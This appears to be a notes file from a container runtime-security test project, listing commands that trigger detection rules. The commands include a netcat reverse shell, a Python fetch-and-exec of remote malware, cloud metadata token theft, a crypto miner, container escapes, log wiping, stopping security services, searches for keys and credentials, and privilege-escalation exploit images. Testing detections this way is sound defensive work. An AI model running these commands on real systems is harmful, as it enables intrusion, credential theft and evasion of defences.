This file is just for informative purpose. Scripts not using this file for any purpose. Script uses yaml file for each in the 'yamls' folder.
------------------------------------------------------
1. Exploit vsftpd Vulnerability --need to write yaml for this
#This command creates shell process from vsftpd. This is not exact use case of vsftpd. For time being, we have created this.
cp /bin/bash vsftpd; ./vsftpd -c /bin/sh
------------------------------------------------------
2. Credential access bash history'
cat /.bash_history
rm /.zsh_history
------------------------------------------------------
3. Cloud credentials accessed by network utility
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` \
&& curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/
------------------------------------------------------
4. 	CryptoMiner Execution
Deploy the  kubernet pod.yml or run command:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: miner-test
spec:
  selector:
    matchLabels:
      app: miner-test
  replicas: 1 # tells deployment to run 1 pods matching the template
  template: # create pods using pod definition in this template
    metadata:
      labels:
        app: miner-test
    spec:
      dnsConfig:
        nameservers:
          - 8.8.8.8
      containers:
      - name: miner-test
        image: miningcontainers/xmrig:latest

command:
/bin/sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1\
------------------------------------------------------
5. Network scanning utility
/usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 221.0.0.0/16 6379
------------------------------------------------------
6. Container escape via cgroup
unshare -UrmC bash
mount -t cgroup -o memory cgroup /mnt
------------------------------------------------------
7. Container escape using runtime socket
curl -s --unix-socket /var/run/docker.sock -H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["sh","-c","echo Hello from Alpine"],"AttachStdout":true,"AttachStderr":true}' \
http://localhost/containers/create?name=alpine-from-api
------------------------------------------------------
8. Container escape using docker socket
docker run --rm -it --privileged -v /:/mnt alpine chroot /mnt
------------------------------------------------------
9. Process hiding
/usr/bin/sed -i s/evil_script.py/pnscan/g /var/tmp/.11/..lph/processhider.c
------------------------------------------------------
10. Stop Antimalware Process
service aliyun.service stop 
service apparmor stop
service bcm-agent stop
service aegis stop 
------------------------------------------------------
11. clear system logs
rm /var/log/syslog; rm /var/log/messages; rm /var/log/auth.log; rm /var/log/secure; rm /var/log/boot.log; rm /var/log/maillog; rm /var/log/mail.log; rm /var/log/kern.log; rm /var/log/dmesg; rm /var/log/faillog; rm /var/log/cron; rm /var/log/daemon.log; rm /var/log/btmp; rm /var/log/mysqld.log; rm /var/log/mysql.log; rm /var/log/xferlog; sleep infinity
------------------------------------------------------
12. Process hidden using mount hidepid
mount -o bind /empty/dir /proc/42
mount -o remount,hidepid=2 /proc

------------------------------------------------------
13. Curl Using Socks Proxy
curl -x socks4://proxy.example.com http://www.example.com/
------------------------------------------------------
14. Process Execution from Memory
#reference link: https://stackoverflow.com/questions/63208333/using-memfd-create-and-fexecve-to-run-elf-from-memory
#currently, seperate container is created to pull the image: "angelrita/memfd-exec:latest". But, poc binary is also present in base-ubuntu image. we can just run following commmand. 
./memfd-exec
------------------------------------------------------
15. Netcat Reverse Shell Execution
command:
nc -e /bin/bash 10.113.107.226 4444

There are many other variations are covered in the rule.
details:
Inside container:
//////////////////
FROM alpine:latest

# Install netcat (OpenBSD version for better compatibility)
RUN apk add --no-cache netcat-openbsd

# Set working dir
WORKDIR /app

# Run an example nc command (e.g., listen on port 8080)
CMD ["nc", "-lk", "-p", "8080"]
/////////////////
docker build -t nc-server:latest .
docker run --rm -p 8080:8080 nc-server:latest
#from remote machine
nc localhost 8080
/////////////////
apiVersion: v1
kind: Pod
metadata:
  name: nc-server
spec:
  containers:
  - name: nc
    image: nc-server:latest
    imagePullPolicy: Never
    ports:
    - containerPort: 8080


------------------------------------------------------
16. Usage of Steganography tools
steghide embed -cf -ef secret.txt test.jpg
------------------------------------------------------
17. Compiler executed in container
gcc -o memfd-exec memfd-exec.c
------------------------------------------------------
18. Container management utility in container
docker run --rm -it --privileged -v /:/mnt alpine chroot /mnt
------------------------------------------------------
19. Interactive shell spawned in container
sh -i
------------------------------------------------------
20. Kubernetes service account token created in container
kubectl create serviceaccount my-serviceaccount
------------------------------------------------------
21. Local account password modified
passwd
------------------------------------------------------
22. Network utility executed
tcpdump
------------------------------------------------------
23. Package Management Process in Container
apt install gdb
------------------------------------------------------
24. Python executed with suspicious arguments
python -c 'import urllib.request; exec(urllib.request.urlopen("http://10.113.107.226:8000/malware.py").read())'
------------------------------------------------------
25. GDB Executed in Container
gdb ./memfd-create
------------------------------------------------------
26. Insmod Executed in Container
modprobe br_netfilter
------------------------------------------------------
27. Sudo Potential Privilege Escalation
pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: sudoedit-privesc
spec:
containers:
- name: sudoedit-privesc
  image: chenaotian/cve-2021-3156:latest
  #imagePullPolicy: Never
  command: ["sh"]
  args: ['-c', 'cd ~/exp; su test; ./exp; whoami > whoami.txt']
------------------------------------------------------
28. Polkit Local Privilege Escalation
pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: polkit-privesc
spec:
  containers:
  - name: polkit-privesc
    image: baconspider/cve-2021-4034:latest
    imagePullPolicy: Never
    command: ["sh"]
    args: ['-c', './pwnkit']

------------------------------------------------------
29. Search Private Keys and Passwords
find / -name id_rsa; grep "BEGIN RSA PRIVATE KEY" ~/.ssh/id_rsa; find /home -name id_ed25519; egrep "BEGIN OPENSSH PRIVATE KEY" ~/.ssh/id_ed25519; fgrep "BEGIN PRIVATE KEY" ~/.ssh/id_ecdsa
------------------------------------------------------
30. Debugfs Launched in Container
debugfs
------------------------------------------------------
31. Find AWS Credentials
grep aws_access_key_id ~/.aws/credentials; fgrep secretaccesskey somefile.txt; grep hello file.txt; grep aws_secret_access_key config.txt; find / -name .aws/credentials; mlocate .aws/credentials; locate secrets.txt
------------------------------------------------------
32. Schedule Cron Jobs
#run start of the hour
crontab -e
0 * * * * /usr/bin/python /path/to/your/script.py
------------------------------------------------------
33. DB program spawned process --- to do
mysqld -> whoami
------------------------------------------------------
34. Launch Remote File Copy Tools in Container
scp test@10.113.107.226:/home/Downloads/test.png .
------------------------------------------------------
35. Launch Ingress Remote File Copy Tools in Container
curl --location --request GET 'https://go.microsoft.com/fwlink/?linkid=2108834&Channel=Stable&language=en' --output foo.exe
------------------------------------------------------
